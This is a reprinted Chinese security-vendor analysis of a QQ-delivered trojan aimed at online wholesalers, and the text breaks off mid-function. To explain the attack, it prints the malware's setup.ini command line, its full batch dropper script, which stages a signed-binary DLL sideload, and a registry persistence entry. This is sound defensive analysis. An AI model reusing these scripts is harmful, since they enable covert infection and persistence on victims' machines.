中关村商情网

搜索
中关村商情网 首页 IT业界 信息安全 查看内容

远控木马巧设“白加黑”陷阱:瞄准网店批发商牟取钱财

2018-2-1 23:21| 发布者: admin| 查看: 4558| 评论: 0

摘要:   前言  近日,360安全中心监测到有不法分子通过添加QQ好友的形式,以沟通商品交易的名义发送名为“这几天团队的量”的文件,一旦接收并打开文件,电脑将被远程控制,不法分子可进一步盗取隐私及财物、甚至植入 ...

  前言

  近日,360安全中心监测到有不法分子通过添加QQ好友的形式,以沟通商品交易的名义发送名为“这几天团队的量”的文件,一旦接收并打开文件,电脑将被远程控制,不法分子可进一步盗取隐私及财物、甚至植入病毒实现敲诈勒索等操作。

  360安全中心对该样本进行分析发现,“这几天团队的量.rar”是一个将木马打包在其中的压缩包文件,投递目标主要是网络批发商。牧马人通过将木马伪装成数量详情图片文件,在与商家沟通的期间,发送木马文件给商家,引诱商家中招。

  当网店批发商在接受到文件后,解压出文件夹并点击了文件夹中的“宝贝批发数量.com”后,木马就会在后台偷偷跑起来。

  

 

  图0:解压后文件夹内容

  文件夹结构

  ┌─ 宝贝批发数量.com

  │

  ├─ setup.ini

  │

  └─ Data

  ├─ 2018.jpg

  │

  ├─ 360666

  │ ├─ 360666.PNG

  │ ├─ date

  │ ├─ QQAPP.exe

  │ ├─ Readme.txt

  │ ├─ TEMA

  │ ├─ WPS_office2016.lnk

  │ └─ WPS_office2017.lnk

  │

  └─ Order

  ├─ m.exe

  ├─ WoodTorch.exe

  └─ WPS.JPG

  分析

  宝贝批发数量.com

  该文件其实为白文件,它带有艾威梯科技(北京)有限公司数字签名。

  

 

  图1:白文件 签名信息

  程序在执行起来后会读取同目录下的setup.ini文件,根据配置文件中Install项里的CmdLine执行命令。而文件常规打开是一堆乱码,在十六进制试图下可以清楚看到Cmdline命令。

  

 

  图2:记事本浏览视图

  

 

  图3:十六进制浏览视图

  Cmdline命令如下:

  [Install]

  CmdLine=DataOrderWoodTorch.exe execmd DataOrderm.exe /c DataOrderm.exe `< DataOrderWPS.JPG

  WoodTorch.exe

  被宝贝批发数量.com加载起来的WoodTorch.exe,实质上是命令行工具Nircmd。而上述的命令语句则是通过execmd这个执行命令指示符,在不显示任何信息至屏幕的情况下执行下面的语句:

  DataOrderm.exe /c DataOrderm.exe `< DataOrderWPS.JPG

  m.exe

  系统的cmd程序,它的作用是用于加载WPS.JPG这个批处理文件。

  WPS.JPG

  从文件名上来看它是一个图片,但内容为批处理脚本。内容如下:

  

 

  图4:WPS.JPG

  @echo off

  cmd.exe /c start data2018.jpg

  md c:microsoft

  copy Data360666Readme.txt c:microsoftReadme.txt

  copy Data360666date c:microsoftdate

  copy Data360666360666.PNG c:microsoft360666.PNG

  copy Data360666QQAPP.exe c:microsoftQQAPP.exe

  copy /b Data360666TEMA+ Data360666WPS_office2016.lnk+Data360666WPS_office2017.lnk c:microsoftcommon.dll

  start C:MicrosoftQQApp.exe

  start c:windowssystem32 undll32.exe advpack.dll,LaunchINFSection c:microsoft360666.png,DefaultInstall

  pause

  行为分析:

  1. 打开Data目录下的2018.jpg图片

  2. 创建目录 c:microsoft目录

  3. 拷贝Data360666目录下的Readme.txt、date、360666.PNG、QQAPP.exe到c:microsoft目录中

  4. 合并Data360666目录下的TEMA、WPS_office2016.lnk、WPS_office2017.lnk为c:microsoft目录下common.dll

  5. 执行C:MicrosoftQQApp.exe

  6. 执行c:windowssystem32 undll32.exe advpack.dll,LaunchINFSection c:microsoft360666.png,DefaultInstall

  步骤1的目的是为了让批发商觉得自己真的是打开了一张图片

  

 

  图5:数量图

  步骤2-5为白加黑木马部分

  QQAPP.exe是带有腾讯签名的白文件,由于QQAPP.exe在调用Common.dll时,没有对Common.dll进行校验。牧马人通过将恶意文件拆分成TEMA、WPS_office2016.lnk、WPS_office2017.lnk三个文件,在程序执行过程中合并成common.dll。当QQAPP.exe执行的时候,恶意的common.dll就会被自动加载,从而执行恶意代码。

  l 步骤6的目的是通过360666.png中的配置信息让QQAPP.exe能够在重启后自启动,达到木马驻留受害者电脑的目的。

  [Version]

  Signature="$Windows NT$"

  [Defaultinstall]

  addREG=Gc

  [Gc]

  HKCU,"SoftwareMicrosoftWindows NTCurrentVersionWinlogon","shell","0x00000000","Explorer.exe,C:MicrosoftQQApp.exe"

  common.dll

  InitBugReport :

  a. 通过访问www[.]baidu[.]com测试网络连通性,如果访问失败则ExitProcess。

  

 

  图6:测试网络连通性

  b. 导出函数为空,伪造源文件导出函数SetBugReportUin、ValidateBugReport。

  void __cdecl TXBugReport::SetBugReportUin()

  {

  sub_10001F44();

  }

  void sub_10001F44()

  {

  ;

  }

  void __cdecl TXBugReport::ValidateBugReport()

  {

  sub_10001F4B();

  }

  void sub_10001F4B()

  {

  ;

  }

  c. 解密Readme.txt,解密后的Readme_dump文件为PeLoad。它负责读取解密同目录下的date文件,并创建新的线程执行解密后的date。

  

 

  图7:创建线程

  Readme_dump(解密后的Readme.txt)

  a. 干扰函数

  void Sleeps()

  {